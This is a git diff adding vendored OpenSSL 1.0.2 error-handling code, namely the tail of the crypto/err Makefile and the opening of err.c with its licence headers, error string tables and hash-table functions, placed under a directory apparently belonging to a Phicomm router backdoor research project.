+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+err.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/buffer.h
+err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+err.o: ../cryptlib.h err.c
+err_all.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+err_all.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+err_all.o: ../../include/openssl/cms.h ../../include/openssl/conf.h
+err_all.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+err_all.o: ../../include/openssl/dsa.h ../../include/openssl/dso.h
+err_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+err_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+err_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+err_all.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+err_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+err_all.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs12.h
+err_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+err_all.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+err_all.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+err_all.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+err_all.o: ../../include/openssl/ui.h ../../include/openssl/x509.h
+err_all.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+err_all.o: err_all.c
+err_prn.o: ../../e_os.h ../../include/openssl/bio.h
+err_prn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+err_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+err_prn.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+err_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+err_prn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+err_prn.o: ../../include/openssl/symhacks.h ../cryptlib.h err_prn.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.c
new file mode 100644
index 0000000..e77d963
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.c
@@ -0,0 +1,1145 @@
+/* crypto/err/err.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdarg.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/bio.h>
+#include <openssl/err.h>
+
+DECLARE_LHASH_OF(ERR_STRING_DATA);
+DECLARE_LHASH_OF(ERR_STATE);
+
+static void err_load_strings(int lib, ERR_STRING_DATA *str);
+
+static void ERR_STATE_free(ERR_STATE *s);
+#ifndef OPENSSL_NO_ERR
+static ERR_STRING_DATA ERR_str_libraries[] = {
+    {ERR_PACK(ERR_LIB_NONE, 0, 0), "unknown library"},
+    {ERR_PACK(ERR_LIB_SYS, 0, 0), "system library"},
+    {ERR_PACK(ERR_LIB_BN, 0, 0), "bignum routines"},
+    {ERR_PACK(ERR_LIB_RSA, 0, 0), "rsa routines"},
+    {ERR_PACK(ERR_LIB_DH, 0, 0), "Diffie-Hellman routines"},
+    {ERR_PACK(ERR_LIB_EVP, 0, 0), "digital envelope routines"},
+    {ERR_PACK(ERR_LIB_BUF, 0, 0), "memory buffer routines"},
+    {ERR_PACK(ERR_LIB_OBJ, 0, 0), "object identifier routines"},
+    {ERR_PACK(ERR_LIB_PEM, 0, 0), "PEM routines"},
+    {ERR_PACK(ERR_LIB_DSA, 0, 0), "dsa routines"},
+    {ERR_PACK(ERR_LIB_X509, 0, 0), "x509 certificate routines"},
+    {ERR_PACK(ERR_LIB_ASN1, 0, 0), "asn1 encoding routines"},
+    {ERR_PACK(ERR_LIB_CONF, 0, 0), "configuration file routines"},
+    {ERR_PACK(ERR_LIB_CRYPTO, 0, 0), "common libcrypto routines"},
+    {ERR_PACK(ERR_LIB_EC, 0, 0), "elliptic curve routines"},
+    {ERR_PACK(ERR_LIB_SSL, 0, 0), "SSL routines"},
+    {ERR_PACK(ERR_LIB_BIO, 0, 0), "BIO routines"},
+    {ERR_PACK(ERR_LIB_PKCS7, 0, 0), "PKCS7 routines"},
+    {ERR_PACK(ERR_LIB_X509V3, 0, 0), "X509 V3 routines"},
+    {ERR_PACK(ERR_LIB_PKCS12, 0, 0), "PKCS12 routines"},
+    {ERR_PACK(ERR_LIB_RAND, 0, 0), "random number generator"},
+    {ERR_PACK(ERR_LIB_DSO, 0, 0), "DSO support routines"},
+    {ERR_PACK(ERR_LIB_TS, 0, 0), "time stamp routines"},
+    {ERR_PACK(ERR_LIB_ENGINE, 0, 0), "engine routines"},
+    {ERR_PACK(ERR_LIB_OCSP, 0, 0), "OCSP routines"},
+    {ERR_PACK(ERR_LIB_FIPS, 0, 0), "FIPS routines"},
+    {ERR_PACK(ERR_LIB_CMS, 0, 0), "CMS routines"},
+    {ERR_PACK(ERR_LIB_HMAC, 0, 0), "HMAC routines"},
+    {0, NULL},
+};
+
+static ERR_STRING_DATA ERR_str_functs[] = {
+    {ERR_PACK(0, SYS_F_FOPEN, 0), "fopen"},
+    {ERR_PACK(0, SYS_F_CONNECT, 0), "connect"},
+    {ERR_PACK(0, SYS_F_GETSERVBYNAME, 0), "getservbyname"},
+    {ERR_PACK(0, SYS_F_SOCKET, 0), "socket"},
+    {ERR_PACK(0, SYS_F_IOCTLSOCKET, 0), "ioctlsocket"},
+    {ERR_PACK(0, SYS_F_BIND, 0), "bind"},
+    {ERR_PACK(0, SYS_F_LISTEN, 0), "listen"},
+    {ERR_PACK(0, SYS_F_ACCEPT, 0), "accept"},
+# ifdef OPENSSL_SYS_WINDOWS
+    {ERR_PACK(0, SYS_F_WSASTARTUP, 0), "WSAstartup"},
+# endif
+    {ERR_PACK(0, SYS_F_OPENDIR, 0), "opendir"},
+    {ERR_PACK(0, SYS_F_FREAD, 0), "fread"},
+    {0, NULL},
+};
+
+static ERR_STRING_DATA ERR_str_reasons[] = {
+    {ERR_R_SYS_LIB, "system lib"},
+    {ERR_R_BN_LIB, "BN lib"},
+    {ERR_R_RSA_LIB, "RSA lib"},
+    {ERR_R_DH_LIB, "DH lib"},
+    {ERR_R_EVP_LIB, "EVP lib"},
+    {ERR_R_BUF_LIB, "BUF lib"},
+    {ERR_R_OBJ_LIB, "OBJ lib"},
+    {ERR_R_PEM_LIB, "PEM lib"},
+    {ERR_R_DSA_LIB, "DSA lib"},
+    {ERR_R_X509_LIB, "X509 lib"},
+    {ERR_R_ASN1_LIB, "ASN1 lib"},
+    {ERR_R_CONF_LIB, "CONF lib"},
+    {ERR_R_CRYPTO_LIB, "CRYPTO lib"},
+    {ERR_R_EC_LIB, "EC lib"},
+    {ERR_R_SSL_LIB, "SSL lib"},
+    {ERR_R_BIO_LIB, "BIO lib"},
+    {ERR_R_PKCS7_LIB, "PKCS7 lib"},
+    {ERR_R_X509V3_LIB, "X509V3 lib"},
+    {ERR_R_PKCS12_LIB, "PKCS12 lib"},
+    {ERR_R_RAND_LIB, "RAND lib"},
+    {ERR_R_DSO_LIB, "DSO lib"},
+    {ERR_R_ENGINE_LIB, "ENGINE lib"},
+    {ERR_R_OCSP_LIB, "OCSP lib"},
+    {ERR_R_TS_LIB, "TS lib"},
+
+    {ERR_R_NESTED_ASN1_ERROR, "nested asn1 error"},
+    {ERR_R_BAD_ASN1_OBJECT_HEADER, "bad asn1 object header"},
+    {ERR_R_BAD_GET_ASN1_OBJECT_CALL, "bad get asn1 object call"},
+    {ERR_R_EXPECTING_AN_ASN1_SEQUENCE, "expecting an asn1 sequence"},
+    {ERR_R_ASN1_LENGTH_MISMATCH, "asn1 length mismatch"},
+    {ERR_R_MISSING_ASN1_EOS, "missing asn1 eos"},
+
+    {ERR_R_FATAL, "fatal"},
+    {ERR_R_MALLOC_FAILURE, "malloc failure"},
+    {ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED,
+     "called a function you should not call"},
+    {ERR_R_PASSED_NULL_PARAMETER, "passed a null parameter"},
+    {ERR_R_INTERNAL_ERROR, "internal error"},
+    {ERR_R_DISABLED, "called a function that was disabled at compile-time"},
+
+    {0, NULL},
+};
+#endif
+
+/* Define the predeclared (but externally opaque) "ERR_FNS" type */
+struct st_ERR_FNS {
+    /* Works on the "error_hash" string table */
+    LHASH_OF(ERR_STRING_DATA) *(*cb_err_get) (int create);
+    void (*cb_err_del) (void);
+    ERR_STRING_DATA *(*cb_err_get_item) (const ERR_STRING_DATA *);
+    ERR_STRING_DATA *(*cb_err_set_item) (ERR_STRING_DATA *);
+    ERR_STRING_DATA *(*cb_err_del_item) (ERR_STRING_DATA *);
+    /* Works on the "thread_hash" error-state table */
+    LHASH_OF(ERR_STATE) *(*cb_thread_get) (int create);
+    void (*cb_thread_release) (LHASH_OF(ERR_STATE) **hash);
+    ERR_STATE *(*cb_thread_get_item) (const ERR_STATE *);
+    ERR_STATE *(*cb_thread_set_item) (ERR_STATE *);
+    void (*cb_thread_del_item) (const ERR_STATE *);
+    /* Returns the next available error "library" numbers */
+    int (*cb_get_next_lib) (void);
+};
+
+/* Predeclarations of the "err_defaults" functions */
+static LHASH_OF(ERR_STRING_DATA) *int_err_get(int create);
+static void int_err_del(void);
+static ERR_STRING_DATA *int_err_get_item(const ERR_STRING_DATA *);
+static ERR_STRING_DATA *int_err_set_item(ERR_STRING_DATA *);
+static ERR_STRING_DATA *int_err_del_item(ERR_STRING_DATA *);
+static LHASH_OF(ERR_STATE) *int_thread_get(int create);
+static void int_thread_release(LHASH_OF(ERR_STATE) **hash);
+static ERR_STATE *int_thread_get_item(const ERR_STATE *);
+static ERR_STATE *int_thread_set_item(ERR_STATE *);
+static void int_thread_del_item(const ERR_STATE *);
+static int int_err_get_next_lib(void);
+/* The static ERR_FNS table using these defaults functions */
+static const ERR_FNS err_defaults = {
+    int_err_get,
+    int_err_del,
+    int_err_get_item,
+    int_err_set_item,
+    int_err_del_item,
+    int_thread_get,
+    int_thread_release,
+    int_thread_get_item,
+    int_thread_set_item,
+    int_thread_del_item,
+    int_err_get_next_lib
+};
+
+/* The replacable table of ERR_FNS functions we use at run-time */
+static const ERR_FNS *err_fns = NULL;
+
+/* Eg. rather than using "err_get()", use "ERRFN(err_get)()". */
+#define ERRFN(a) err_fns->cb_##a
+
+/*
+ * The internal state used by "err_defaults" - as such, the setting, reading,
+ * creating, and deleting of this data should only be permitted via the
+ * "err_defaults" functions. This way, a linked module can completely defer
+ * all ERR state operation (together with requisite locking) to the
+ * implementations and state in the loading application.
+ */
+static LHASH_OF(ERR_STRING_DATA) *int_error_hash = NULL;
+static LHASH_OF(ERR_STATE) *int_thread_hash = NULL;
+static int int_thread_hash_references = 0;
+static int int_err_library_number = ERR_LIB_USER;
+
+/*
+ * Internal function that checks whether "err_fns" is set and if not, sets it
+ * to the defaults.
+ */
+static void err_fns_check(void)
+{
+    if (err_fns)
+        return;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    if (!err_fns)
+        err_fns = &err_defaults;
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+}
+
+/* API functions to get or set the underlying ERR functions. */
+
+const ERR_FNS *ERR_get_implementation(void)
+{
+    err_fns_check();
+    return err_fns;
+}
+
+int ERR_set_implementation(const ERR_FNS *fns)
+{
+    int ret = 0;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    /*
+     * It's too late if 'err_fns' is non-NULL. BTW: not much point setting an
+     * error is there?!
+     */
+    if (!err_fns) {
+        err_fns = fns;
+        ret = 1;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+    return ret;
+}
+
+/*
+ * These are the callbacks provided to "lh_new()" when creating the LHASH
+ * tables internal to the "err_defaults" implementation.
+ */
+
+static unsigned long get_error_values(int inc, int top, const char **file,
+                                      int *line, const char **data,
+                                      int *flags);
+
+/* The internal functions used in the "err_defaults" implementation */
+
+static unsigned long err_string_data_hash(const ERR_STRING_DATA *a)
+{
+    unsigned long ret, l;
+
+    l = a->error;
+    ret = l ^ ERR_GET_LIB(l) ^ ERR_GET_FUNC(l);
+    return (ret ^ ret % 19 * 13);
+}
+
+static IMPLEMENT_LHASH_HASH_FN(err_string_data, ERR_STRING_DATA)
+
+static int err_string_data_cmp(const ERR_STRING_DATA *a,
+                               const ERR_STRING_DATA *b)
+{
+    return (int)(a->error - b->error);
+}
+
+static IMPLEMENT_LHASH_COMP_FN(err_string_data, ERR_STRING_DATA)
+
+static LHASH_OF(ERR_STRING_DATA) *int_err_get(int create)
+{
+    LHASH_OF(ERR_STRING_DATA) *ret = NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    if (!int_error_hash && create) {
+        CRYPTO_push_info("int_err_get (err.c)");
+        int_error_hash = lh_ERR_STRING_DATA_new();
+        CRYPTO_pop_info();
+    }
+    if (int_error_hash)
+        ret = int_error_hash;
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+
+    return ret;
+}
+
+static void int_err_del(void)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    if (int_error_hash) {
+        lh_ERR_STRING_DATA_free(int_error_hash);
+        int_error_hash = NULL;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+}
+
+static ERR_STRING_DATA *int_err_get_item(const ERR_STRING_DATA *d)
+{
+    ERR_STRING_DATA *p;
+    LHASH_OF(ERR_STRING_DATA) *hash;
+
+    err_fns_check();
+    hash = ERRFN(err_get) (0);
+    if (!hash)
+        return NULL;
+
+    CRYPTO_r_lock(CRYPTO_LOCK_ERR);
+    p = lh_ERR_STRING_DATA_retrieve(hash, d);
+    CRYPTO_r_unlock(CRYPTO_LOCK_ERR);
+
+    return p;
+}
+
+static ERR_STRING_DATA *int_err_set_item(ERR_STRING_DATA *d)
+{
+    ERR_STRING_DATA *p;
+    LHASH_OF(ERR_STRING_DATA) *hash;
+
+    err_fns_check();
+    hash = ERRFN(err_get) (1);
+    if (!hash)
+        return NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    p = lh_ERR_STRING_DATA_insert(hash, d);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+
+    return p;
+}
+
+static ERR_STRING_DATA *int_err_del_item(ERR_STRING_DATA *d)
+{
+    ERR_STRING_DATA *p;
+    LHASH_OF(ERR_STRING_DATA) *hash;
+
+    err_fns_check();
+    hash = ERRFN(err_get) (0);
+    if (!hash)
+        return NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    p = lh_ERR_STRING_DATA_delete(hash, d);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+
+    return p;
+}
+
+static unsigned long err_state_hash(const ERR_STATE *a)
+{
+    return CRYPTO_THREADID_hash(&a->tid) * 13;
+}
+
+static IMPLEMENT_LHASH_HASH_FN(err_state, ERR_STATE)
+
+static int err_state_cmp(const ERR_STATE *a, const ERR_STATE *b)
+{
+    return CRYPTO_THREADID_cmp(&a->tid, &b->tid);
+}
+
+static IMPLEMENT_LHASH_COMP_FN(err_state, ERR_STATE)
+
+static LHASH_OF(ERR_STATE) *int_thread_get(int create)
+{
+    LHASH_OF(ERR_STATE) *ret = NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    if (!int_thread_hash && create) {
+        CRYPTO_push_info("int_thread_get (err.c)");
+        int_thread_hash = lh_ERR_STATE_new();
+        CRYPTO_pop_info();
+    }
+    if (int_thread_hash) {
+        int_thread_hash_references++;
+        ret = int_thread_hash;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+    return ret;
+}
+
+static void int_thread_release(LHASH_OF(ERR_STATE) **hash)
+{
+    int i;
+
+    if (hash == NULL || *hash == NULL)
+        return;
+
+    i = CRYPTO_add(&int_thread_hash_references, -1, CRYPTO_LOCK_ERR);
+
+#ifdef REF_PRINT
+    fprintf(stderr, "%4d:%s\n", int_thread_hash_references, "ERR");
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "int_thread_release, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+    *hash = NULL;
+}
+
+static ERR_STATE *int_thread_get_item(const ERR_STATE *d)
+{
+    ERR_STATE *p;
+    LHASH_OF(ERR_STATE) *hash;
+
+    err_fns_check();
+    hash = ERRFN(thread_get) (0);
+    if (!hash)
+        return NULL;
+
+    CRYPTO_r_lock(CRYPTO_LOCK_ERR);
+    p = lh_ERR_STATE_retrieve(hash, d);
+    CRYPTO_r_unlock(CRYPTO_LOCK_ERR);
+
+    ERRFN(thread_release) (&hash);
+    return p;
+}
+
+static ERR_STATE *int_thread_set_item(ERR_STATE *d)
+{
+    ERR_STATE *p;
+    LHASH_OF(ERR_STATE) *hash;
+
+    err_fns_check();
+    hash = ERRFN(thread_get) (1);
+    if (!hash)
+        return NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    p = lh_ERR_STATE_insert(hash, d);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+
+    ERRFN(thread_release) (&hash);
+    return p;
+}
+
+static void int_thread_del_item(const ERR_STATE *d)
+{
+    ERR_STATE *p;
+    LHASH_OF(ERR_STATE) *hash;
+
+    err_fns_check();
+    hash = ERRFN(thread_get) (0);
+    if (!hash)
+        return;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    p = lh_ERR_STATE_delete(hash, d);
+    /* make sure we don't leak memory */
+    if (int_thread_hash_references == 1
+        && int_thread_hash && lh_ERR_STATE_num_items(int_thread_hash) == 0) {
+        lh_ERR_STATE_free(int_thread_hash);
+        int_thread_hash = NULL;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+
+    ERRFN(thread_release) (&hash);
+    if (p)
+        ERR_STATE_free(p);
+}
+
+static int int_err_get_next_lib(void)
+{
+    int ret;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    ret = int_err_library_number++;
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+
+    return ret;
+}
+
+#ifndef OPENSSL_NO_ERR
+# define NUM_SYS_STR_REASONS 127
+# define LEN_SYS_STR_REASON 32
+
+static ERR_STRING_DATA SYS_str_reasons[NUM_SYS_STR_REASONS + 1];
+/*
+ * SYS_str_reasons is filled with copies of strerror() results at
+ * initialization. 'errno' values up to 127 should cover all usual errors,
+ * others will be displayed numerically by ERR_error_string. It is crucial
+ * that we have something for each reason code that occurs in
+ * ERR_str_reasons, or bogus reason strings will be returned for SYSerr(),
+ * which always gets an errno value and never one of those 'standard' reason
+ * codes.
+ */
+
+static void build_SYS_str_reasons(void)
+{
+    /* OPENSSL_malloc cannot be used here, use static storage instead */
+    static char strerror_tab[NUM_SYS_STR_REASONS][LEN_SYS_STR_REASON];
+    int i;
+    static int init = 1;
+
+    CRYPTO_r_lock(CRYPTO_LOCK_ERR);
+    if (!init) {
+        CRYPTO_r_unlock(CRYPTO_LOCK_ERR);
+        return;
+    }
+
+    CRYPTO_r_unlock(CRYPTO_LOCK_ERR);
+    CRYPTO_w_lock(CRYPTO_LOCK_ERR);
+    if (!init) {
+        CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+        return;
+    }
+
+    for (i = 1; i <= NUM_SYS_STR_REASONS; i++) {
+        ERR_STRING_DATA *str = &SYS_str_reasons[i - 1];
+
+        str->error = (unsigned long)i;
+        if (str->string == NULL) {
+            char (*dest)[LEN_SYS_STR_REASON] = &(strerror_tab[i - 1]);
+            char *src = strerror(i);
+            if (src != NULL) {
+                strncpy(*dest, src, sizeof *dest);
+                (*dest)[sizeof *dest - 1] = '\0';
+                str->string = *dest;
+            }
+        }
+        if (str->string == NULL)
+            str->string = "unknown";
+    }
+
+    /*
+     * Now we still have SYS_str_reasons[NUM_SYS_STR_REASONS] = {0, NULL}, as
+     * required by ERR_load_strings.
+     */
+
+    init = 0;
+
+    CRYPTO_w_unlock(CRYPTO_LOCK_ERR);
+}
+#endif
+
+#define err_clear_data(p,i) \
+        do { \
+        if (((p)->err_data[i] != NULL) && \
+                (p)->err_data_flags[i] & ERR_TXT_MALLOCED) \
+                {  \
+                OPENSSL_free((p)->err_data[i]); \
+                (p)->err_data[i]=NULL; \
+                } \
+        (p)->err_data_flags[i]=0; \
+        } while(0)
+
+#define err_clear(p,i) \
+        do { \
+        (p)->err_flags[i]=0; \
+        (p)->err_buffer[i]=0; \
+        err_clear_data(p,i); \
+        (p)->err_file[i]=NULL; \
+        (p)->err_line[i]= -1; \
+        } while(0)
+
+static void ERR_STATE_free(ERR_STATE *s)
+{
+    int i;
+
+    if (s == NULL)
+        return;
+
+    for (i = 0; i < ERR_NUM_ERRORS; i++) {
+        err_clear_data(s, i);
+    }
+    OPENSSL_free(s);
+}
+
+void ERR_load_ERR_strings(void)
+{
+    err_fns_check();
+#ifndef OPENSSL_NO_ERR
+    err_load_strings(0, ERR_str_libraries);
+    err_load_strings(0, ERR_str_reasons);
+    err_load_strings(ERR_LIB_SYS, ERR_str_functs);
+    build_SYS_str_reasons();
+    err_load_strings(ERR_LIB_SYS, SYS_str_reasons);
+#endif
+}
+
+static void err_load_strings(int lib, ERR_STRING_DATA *str)
+{
+    while (str->error) {
+        if (lib)
+            str->error |= ERR_PACK(lib, 0, 0);
+        ERRFN(err_set_item) (str);
+        str++;
+    }
+}
+
+void ERR_load_strings(int lib, ERR_STRING_DATA *str)
+{
+    ERR_load_ERR_strings();
+    err_load_strings(lib, str);
+}
+
+void ERR_unload_strings(int lib, ERR_STRING_DATA *str)
+{
+    while (str->error) {
+        if (lib)
+            str->error |= ERR_PACK(lib, 0, 0);
+        ERRFN(err_del_item) (str);
+        str++;
+    }
+}
+
+void ERR_free_strings(void)
+{
+    err_fns_check();
+    ERRFN(err_del) ();
+}
+
+/********************************************************/
+
+void ERR_put_error(int lib, int func, int reason, const char *file, int line)
+{
+    ERR_STATE *es;
+
+#ifdef _OSD_POSIX
+    /*
+     * In the BS2000-OSD POSIX subsystem, the compiler generates path names
+     * in the form "*POSIX(/etc/passwd)". This dirty hack strips them to
+     * something sensible. @@@ We shouldn't modify a const string, though.
+     */
+    if (strncmp(file, "*POSIX(", sizeof("*POSIX(") - 1) == 0) {
+        char *end;
+
+        /* Skip the "*POSIX(" prefix */
+        file += sizeof("*POSIX(") - 1;
+        end = &file[strlen(file) - 1];
+        if (*end == ')')
+            *end = '\0';
+        /* Optional: use the basename of the path only. */
+        if ((end = strrchr(file, '/')) != NULL)
+            file = &end[1];
+    }
+#endif
